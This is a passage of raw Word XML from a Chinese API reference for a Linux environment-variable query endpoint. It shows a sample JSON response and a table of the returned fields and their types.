        <w:t>/assets/env/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="465EB80E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC7C83A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "key": "BASH_CMDS",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "value": "()",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sysEnv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D593C6D"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452"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="386F43B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36FF5E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="793912ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D980BE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D0D75DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55B3EE13" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F850EA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E901AB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="095D0C70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B2DC22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2553564C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72C1340E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F6DF2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31DC459F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A67A5DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70141250" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="092265DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07AAE1B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A140A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="623A4273" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BC47B64" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D0F6D6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63E55A24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C000B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10E8BDC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13D93F5E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BBE82D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66AE784D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E4A0806" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0922B728" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DB21FF0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1060B7B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6974B4A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D436E51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EEBF8BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="51C3D529" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557FF348" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28A4FABB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C33AF26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45D32F21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33E81836" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D56D5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D1A96E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="645DCB95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D57FF3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="73D380E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69F5A110" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F30CDAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E4EA6FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A68DC2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0AE5B60B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14047CCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B349387" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B0C475B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="211A596F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2DAAE039" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="298578BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00760C6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BC7B805" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47EB6C69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>环境变量名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07E31387" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F68A9A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D410EF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03E7BC0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C25F98A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>环境变量值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26C1AE5D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D70E734" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F628277" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6134017F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="232A3F0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="475B78B4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4AFB0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sysEnv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A8E16B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2809263F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
